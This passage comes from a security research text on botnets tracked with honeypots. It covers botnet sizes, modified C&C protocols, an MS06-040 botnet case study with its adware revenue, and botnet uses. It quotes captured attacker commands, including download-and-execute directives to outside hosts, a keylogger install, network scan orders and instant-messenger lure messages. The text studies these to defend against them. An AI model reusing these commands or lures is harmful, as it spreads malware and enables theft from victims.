In this section we present some of the findings we obtained through our observation of botnets. Data is sanitized so that it does not allow one to draw any conclusions about specific attacks against a particular system, and it protects the identity and privacy of those involved. The information about specific attacks and compromised systems was forwarded to DFN-CERT (Computer Emergency Response Team), based in Hamburg, Germany.
The results are based on the observations collected with just several virtual honeypot sensors, either running nepenthes or a full high-interaction honeypot. We start with some statistics about the botnets we have observed in the last few months.
Number of botnets: We were able to track more than 900 botnets during a four-month period. Some of them went offline (i.e., C&C server went offline) and at the time of this writing, we are tracking more than 450 active botnets.
Number of hosts: During these few months, we saw more than 500,000 unique IP addresses joining at least one of the channels we monitored. Seeing an IP means here that the C&C server was not modified to not send a JOIN message for each joining client. If an IRC server is modified not to show joining clients in a channel, we do not see IPs here. Furthermore, some IRC server obfuscate the joining clients IP address and obfuscated IP addresses do not count as seen, too. This shows that the threat posed by botnets is probably worse than originally believed. Even if we are very optimistic and estimate that we track a significant percentage of all botnets and all of our tracked botnet C&C servers are not modified to hide JOINs or obfuscate the joining clients IPs, this would mean that more than one million hosts are compromised and can be controlled by malicious attackers.
Figure 11.6 gives an overview of the most active, unobfuscated botnets during a four-week period. The biggest botnets we have seen in this shorter period had more than 30,000 bots joining the given control channel, and also the other botnets were pretty active. Since many botnets obfuscate the number of bots in the botnet, we cannot easily estimate the real size of such a botnet.
Typical size of botnets: Some botnets consist of only a few hundred bots. In contrast to this, we have also monitored several large botnets with up to 40,000 hosts. The actual size of such a large botnet is hard to estimate. Often the attackers use heavily modified IRC servers and the bots are spread across several C&C servers which are linked together to form a common remote control network.
Dimension of DDoS attacks: We are able to make an educated guess about the current dimension of DDoS attacks caused by botnets. We can observe the commands issued by the controllers and thus see whenever the botnet is used for such attacks. During the observation period of four weeks, we were able to observe almost 300 DDoS attacks against 96 unique targets. Often these attacks targeted dial-up lines, but there are also attacks against bigger websites or other IRC servers.
Spreading of botnets: Commands issued for further spreading of the bots are the most frequently observed messages. Commonly, Windows systems are exploited, and thus we see most traffic on typical Windows ports used for file sharing.
"Updates" within botnets: We also observed updates of botnets quite frequently. Updating in this context means that the bots are instructed to download a piece of software from the Internet and then execute it. We could collect a little more than 300 new binaries by observing the control channel. These binaries were almost never detected by antivirus engines.
Botnet controllers also use modified IRC servers to make their botnet stealthier. The following listing is an example of a stripped-down IRC server, which does not report the usual information upon connecting. The arrows show the communication flow in both directions (bot versus botnet server):
$ nc 59.4.XXX.XXX 27397
-> PASS sM1d$t
-> USER XP-8308 * 0 :ZOMBIE1
-> NICK [P00|GBR|83519]
<- :sv8.athost.net 001 [P00|GBR|83519] :
<- :sv8.athost.net 002 [P00|GBR|83519] :
<- :sv8.athost.net 003 [P00|GBR|83519] :
<- :sv8.athost.net 004 [P00|GBR|83519] :
<- :sv8.athost.net 005 [P00|GBR|83519] :
<- :sv8.athost.net 422 [P00|GBR|83519] :
-> JOIN ##predb clos3d
<- :sv8.athost.net 332 [P00|GBR|83519] ##predb :
<- :sv8.athost.net 333 [P00|GBR|83519] ##predb frost
<- :sv8.athost.net NOTICE [P00|GBR|83519] :*** You were forced to join ##d
<- :sv8.athost.net 332 [P00|GBR|83519] ##d :.get
http//www.netau.dk/media/mkeys.knt C:\WINDOWS\system32\tdmk.exe r h
<- :sv8.athost.net 333 [P00|GBR|83519] ##d frost |
Presumably the attacker took the source code of a given IRC server and removed most status messages to avoid being too noisy and giving too much information away. When tracking such a botnet, it is usually not possible to guess its size. We cannot get any additional information about other bots on the network and can only monitor the commands issued by the attacker.
Something we also observe quite often is that the controllers change the protocol of the whole IRC server and modify it in such a way that you cannot use a traditional IRC client to connect to it. For example, the attacker can replace the normal IRC status messages and use other keywords. The following listing gives an example of where the C&C server uses a different syntax:
The modification is rather simple: This server uses SENDN and SENDU instead of the normal NICK and USER, respectively. But even this small change prohibits the use of a traditional IRC client to connect to this botnet and observe it. In this example, we used netcat to connect to the botnet and manually implemented the new protocol. Thanks to the modular design of botspy, it is also easily possible to extend the tool and write a module that can communicate with the modified server.
But there are also modifications regarding the communication protocol that we cannot easily adopt. For example, the botnet controller can implement an encryption scheme — that is, he sends encrypted commands to the bots, which in turn decrypt and execute them. The following listing is an example of such an encrypted session on top of standard IRC:
$ nc 66.186.XXX.XXX 8080 -> USER ri ri ri :Gahoulir Rybur -> NICK rIPRLXJK <- :@_@ 001 rIPRLXJK : -> JOIN ## <- :x.hub.x 332 rIPRLXJK ## <- :=PGNRFf3doG3sSvCTQcY7fkMT+ugAsa3grGtcykWAqXQxjMXc0py7XWz3YgUx y3W/Q3gqt/DObWs/SqIBLFu8MZIHGpvf+AYdpjI5X0FXen2L+v7E36ga+boWk5 lFKWomWxtaTlPdofn/GVuW9oe1KFlEaDEtIwnvbg2kTlVAo6kextoPUae5Yvsq W4E7y414nj1U75hH3Dj/XCZ |
The topic of the channel contains encrypted comands, which we cannot understand, unfortunately. By reverse engineering of the bot, it is possible to find out the issued command, but this is a time-consuming and cumbersome job.
Botnets also use other communication channels for remote command and control. For example, we observed a bot that contacted a given IP address on TCP port 80 after successful infection. The bot did not send any information to that remote host but instantly received commands once the TCP session is established. The following listing shows an example of the commands received:
$ nc 69.64.XXX.XXX 80 down http//www.lollpics.net/jackjohnson.mp3 a.exe;shell a.exe;down http//promo .dollarrevenue.com/webmasterexe/drsmartload1135a.exe drsmartload1135a.exe;shell drsmartload1135a.exe;down http//www.uglyphotos.net/Yinstall.mp3 Yinstall.exe;shell Yinstall.exe;down http//www.lollpics.net/mcsh.mp3 mny.exe;shell mny.exe;shell a.exe; |
Again, we use the tool netcat to connect to TCP port 80. Once we are connected, we receive four different download commands. For each URL, the bot downloads the file to the local system and afterward executes it. This way, the attacker can execute commands on the compromised machine, and he does not need the overhead caused by using an IRC server for C&C. This is an example of an advanced botnet that acts rather stealthily.
For propagating further, bots normally use the most prevalant vulnerabilities in network services from Microsoft Windows. But there are also other propagation mechanism — for example, via instant messenger (IM) tools. The attacker instructs the bots to send out IM messages like the following:
Code View: .aim hey, would you mind if I uploaded 1 of our Europe trip pictures of us to myspace? <A HREF="http://www.diveclub.com.pl/dc/components/ com_extcalendar/pictures-europe1035.pif">http//www.gif-place.org/ users/diveclub.pl/images/pictures-europe1035.gif</A> ,its the one with us on the beach in bikinis. .aim ooooo. I bet Cingular isnt happy. <A HREF="http://www.loadingringtones. usa.gs">http//www.cingular.com/phoneactivations/phones/loadingringtones .usa.gs</A> is stuck on the ringtones page haha. Supposed to be for "New Phone Activations." I tried it, got my 10. hurry b4 its fixed. |
These messages commonly contain social engineering tricks to lure the victim into clicking on the provided link, which in turn opens an executable containing some kind of malware.
As a longer example, we want to take a look at one specific botnet that was very interesting from an analysis point of view. It highlights the common proceeding of attackers and shows how they can make some money with the help of bots and botnets.
At the beginning of August 2006, Microsoft released MS Security Bulletin MS06-040 with the title Vulnerability in Server Service Could Allow Remote Code Execution. This security bulletin contains information about a vulnerable network service that can be exploited to execute arbitrary commands on the victim's machine. A few days later, the first proof of concept exploits were released. These exploits allowed the manual compromise of machines, so no automation yet. But a couple of days later, the first botnets were observed that use this specific vulnerability to propagate further. Thus, the time between a vulnerability announcement and the integration of the exploit in botnets is just a couple of days.
With the help of several honeypots, we quickly caught a sample of such a bot binary: We set up several virtual high-interaction honeypots based on VMware running Windows 2000 without the patch provided for MS06-040. Via closely monitoring the honeypots, we noticed quickly when one of them was infected. Extracting the bot from the infected machine was then rather easy. Through automated analysis, we could retrieve the information about the corresponding botnet in a couple of minutes. The botnet used the DNS name gzn.lx.irc-XXX.org and the server for C&C was listening on TCP port 45130. The main control channel was ##Xport## and the nickname had the form RBOT|DEU|XP-SP0-36079.
For tracking this botnet, we used a normal IRC client. Since it used standard IRC commands, no special tool was necessary. We configured the IRC client with all necessary parameters and then connected to the botnet C&C server. When joining the main control channel ##Xport##, the topic was set to .ircraw join ##scan##,##DR##,##frame##,##o##. The channel topic is interpreted by the bots as a command, and thus they join four additional channels:
##scan##: the topic of this channel was .scan netapi 10030-r-b-s.
Therefore, this channel is used for propagation — that is, scanning for other vulnerable machines and exploiting them.
##DR##: this channel had the topic .download http://promo. dollarrevenue.com/webmasterexe/drsmartload152a.exe c:\dr.exe 1 -s.
It instructs the bots to download an executable from the given address, store it locally on the C:\ drive, and execute it. An analysis of the executable showed that it is used to display advertisement on the machine it is installed on. We take a closer look at this topic later.
##frame##: similar to the previous channel, this channel is also used to generate revenue for the attacker. The topic was set to .download http://zchxsikpgz.biz/dl/loadadv518.exe c:\frm.exe 1 -s.
Hence, the bots download an additional executable and a closer analysis revealed that this binary was also used for advertisement.
##o##: using this channel, the botnet controller installed a third executable on all compromised machines. This channel had the topic .download http://64.18.150.156/niga/nads.exe c:\nds.exe 1 -s,
which also caused the bots to download and execute a file from the given location. This executable is a keylogger, enabling more ways to steal sensitive information from the infected machines.
The following listing was captured when observing the channel ##scan## for less than five minutes:
Code View: 00:06 < RBOT|JPN|XP-SP0-51673> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 59.87.205.37. 00:06 < RBOT|USA|XP-SP1-29968> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 24.85.98.171. 00:07 < RBOT|USA|2K-90511> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 87.192.56.89. 00:07 < RBOT|ITA|2K-89428> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 87.0.189.99. 00:07 < RBOT|PRT|XP-SP0-17833> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 89.152.114.8. 00:07 < RBOT|F|USA|XP-SP0-67725> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 192.168.1.4. 00:07 < RBOT|USA|XP-SP0-62279> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 12.75.18.139. 00:07 < RBOT|JPN|XP-SP0-77299> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 219.167.140.234. 00:07 < RBOT|FRA|2K-22302> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 83.112.179.38. 00:08 < RBOT|ESP|XP-SP0-16174> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 81.37.168.73. 00:08 < RBOT|GBR|XP-SP1-63539> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 86.128.154.138. 00:08 < RBOT|USA|2K-54815> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 204.16.147.68. 00:08 < RBOT|ESP|XP-SP0-36463> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 201.222.226.84. 00:08 < RBOT|ITA|2K-39418> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 82.59.174.137. 00:08 < RBOT|F|ESP|XP-SP1-72157> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 192.168.1.17. 00:09 < RBOT|BRA|XP-SP0-17313> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 201.64.25.118. 00:09 < RBOT|USA|XP-SP0-47155> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 200.8.5.13.00:09 < RBOT|DEU|XP-SP1-35171> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 87.245.51.164. 00:10 < RBOT|ESP|2K-80303> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 201.255.31.232. 00:10 < RBOT|ESP|XP-SP1-12053> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 200.105.18.75. |
As you can see, the propagation was working quite well for the botnet controller. This is due to the fact that, at this point in time, there were many machines that were not yet patched against this new vulnerability.
In the channel ##scan##, the attacker changed the topic several times a day. He often instructed the bots to scan a certain network range — for example, via the command scan netapi 100 3 0 208.102.x.x -r -s or .scan netapi 100 3 0 216.196.x.x -r -s, to scan the network 208.102.0.0/16 or 216.196.0.0/16, respectively. Almost all network ranges belong to dial-up providers. Presumably he expects to find many nonpatched machines in these ranges, and he systematically scanned them.
The interesting aspect is how the controller of the botnet uses it for his financial advantage. We observed the network for about one week, and during this period, no single DDoS attack was started from this rather large botnet. Instead, the botnet controller just installed adware on the compromised machines. As we have just seen, the two channels ##DR## and ##frame## are used to install additional software on the infected machines. The first channel installs a binary from the domain www.dollarrevenue.com. From the description of the website:
"DollarRevenue is one of the best pay-per-install affiliate programs on the Internet. DollarRevenue provides revenue opportunities to affiliates who have entertainment/content websites, offering them an alternativ to traditional advertising methods. DollarRevenue offers high payouts per install and converts internet traffic from any country into real income. There is no better way to convert your traffic into money!" |
So the "business model" of the botnet controller is to install the binary provided from DollarRevenue on the compromised machine and get some revenue via this pay-per-install affiliate program. The payout rates are depicted in Table 11.2. As you can see, these rates vary per country. English-speaking countries generate more revenue, whereas all other countries have a rather low revenue.
USA | $ 0.30 |
Canada | $ 0.20 |
United Kingdom | $ 0.10 |
China | $ 0.01 |
Other countries | $ 0.02 |
Based on all information we have collected when observing the botnet, we can get an insight into the economic aspects of botnets. For example, on August 28, 7729 unique bots were seen in the main channel. Since the nickname of the bots (e.g., RBOT — USA — XP-SP1-15442 or RBOT — CHN — 2K-65840) gives us a pretty good idea of in which country the bot is located, we can estimate the amount of money receives via DollarRevenue. On that particular day, 998 U.S.-based, 20 CAN-based, 103 GBR-based, and 756 CHN-based bots were seen in the channel. Based on these numbers, we can calculate that the botnet controller earned about $438 with just this single channel on a single day. The channel ##frame## was used for another affiliate program, so the botnet controller earned even more. Over the whole one-week period, we have seen more than 40,000 different nicknames in the channel, so we can estimate that the botnet controller earned thousands of dollars via the affiliate programs. In addition, he installed a keylogger via the channel ##o##. This tool can be used to steal sensitive information from the compromised machines, which can then be used for identity theft or other nefarious purposes. Therefore, the attacker can generate even more revenue with his botnet.
Something that is interesting, but rarely seen is botnet owners discussing issues in their bot channel. We observed several of those talks and learned more about their social life this way. The bot-herders often discuss issues related to botnet but also talk about other computer crime–related things or simply talk about what they do.
Our observations showed that often botnets are run by young males with surprisingly limited programming skills. These people often achieve a good spread of their bots, but their actions are more or less harmless. Nevertheless, we also observed some more advanced attackers, but these persons join the control channel only occasionally. They use only one-character nicks, issue a command, and leave. The updates of the bots they run are very professional. Probably these people use the botnets for commercial usage and sell the services. More and more attackers use their botnets for financial gain. For example, by installing browser extensions, they are able to track/fool websurfers, click pop-ups in an automated way, or post adware as presented in the previous section. A small percentage of bot-herders seem highly skilled. They strip down the software used to run the C&C server to a non-RFC-compliant daemon, not even allowing standard IRC clients to connect.
Moreover, the data we captured while observing the botnets show that these control networks are used for more than just DDoS attacks. Possible usages of botnets can be categorized as listed here. And since a botnet is nothing more than a tool, there are most likely other potential uses that we have not listed.
Spamming: Some bots offer the possibility to open a SOCKS v4/v5 proxy — a generic proxy protocol for TCP/IP-based networking applications — on a compromised machine. After enabling the SOCKS proxy, this machine can then be used for nefarious tasks such as sending bulk e-mail (spam) or phishing mails. With the help of a botnet and thousands of bots, an attacker is able to send massive amounts of spam. Some bots also implement a special function to harvest e-mail addresses from the victims.
In addition, this can, of course, also be used to send phishing mails, since phishing is a special case of spam. Also increasing is so-called stock spam: advertising of stocks in spam e-mails. In a study we could show that stock spam indeed influences financial markets [5].
Spreading new malware: In many cases, botnets are used to spread new bots. This is very easy, since all bots implement mechanisms to download and execute a file via HTTP or FTP. But spreading an e-mail virus using a botnet is a very nice idea, too. A botnet with 10,000 hosts that acts as the start base for the mail virus allows very fast spreading and thus causes more harm. The Witty worm, which attacked the ICQ protocol parsing implementation in Internet Security Systems (ISS) products, is suspected to have been initially launched by a botnet because some of the attacking hosts were not running any ISS services.
Installing advertisement addons and Browser Helper Objects (BHOs): Botnets can also be used to gain financial advantages. This works by setting up a fake website with some advertisements. The operator of this website negotiates a deal with some hosting companies that pay for clicks on advertisements. With the help of a botnet, these clicks can be automated so that instantly a few thousand bots click on the pop-ups. This process can be further enhanced if the bot hijacks the start-page of a compromised machine so that the clicks are executed each time the victim uses the browser.
Google AdSense abuse: A similar abuse is also possible with Google's AdSense program. AdSense offers companies the possibility to display Google advertisements on their own website and earn money this way. The company earns money due to clicks on these ads — for example, per 10,000 clicks in one month. An attacker can abuse this program by leveraging his botnet to click on these advertisements in an automated fashion and thus artificially increments the click counter. This kind of usage for botnets is relatively uncommon but not a bad idea from an attacker's perspective.
Attacking IRC networks: Botnets are also used for DDoS attacks against IRC networks. Popular among attackers is especially the so-called clone attack. In this kind of attack, the controller orders each bot to connect a large number of clones to the victim's IRC network. The victim is overwhelmed by service request from thousands of (cloned) bots.
Manipulating online polls/games: Online polls/games are getting more and more attention, and it is rather easy to manipulate them with botnets. Since every bot has a distinct IP address, every vote will have the same credibility as a vote cast by a real person. Online games can be manipulated in a similar way.
Currently we are aware of bots being used that way, and there is a chance that this will get more important in the future.
Sniffing traffic: Bots can also use a packet sniffer to watch for interesting clear-text data passing by a compromised machine. The sniffers are mostly used to retrieve sensitive information like usernames and passwords.
But the sniffed data can also contain other interesting information: If a machine is compromised more than once and also a member of more than one botnet, the packet sniffing allows to gather the key information of the other botnet. Thus, it is possible to "steal" another botnet.
Keylogging: If the compromised machine uses encrypted communication channels (e.g., HTTPS or POP3S), then just sniffing the network packets on the victim's computer is useless, since the appropriate key to decrypt the packets is missing. But most bots also implement functions to log keystrokes. With the help of a keylogger, it is very easy for an attacker to retrieve sensitive information.
An implemented filtering mechanism (e.g., "I am only interested in key sequences near the keyword 'paypal.com'") further helps in stealing secret data.
Harvesting of information: Sometimes we can also observe the harvesting of information from all compromised machines. With the help of special commands, the operator of the botnet can request a list of sensitive information from all bots.
With our method we can shut down the root cause of all of these types of nuisances, and hence the preceding methodology cannot only be used to combat DDoS.
Often the combination of different functionality just described can be used for large-scale identity theft, one of the fastest-growing crimes on the Internet. Phishing mails that pretend to be legitimate (such as fake banking e-mails) ask their intended victims to go online and submit their personal information. These fake e-mails are generated and sent by bots via their spamming mechanism. These same bots can also host multiple fake websites pretending to be well-known brands and harvest personal information. As soon as one of these fake sites is shut down, another one can pop up. In addition, keylogging and sniffing of traffic can also be used for identity theft.
This list demonstrates that attackers can cause a great deal of harm or criminal activity with the help of botnets. In the future we want to investigate how our methodology can be used to counter these attacks.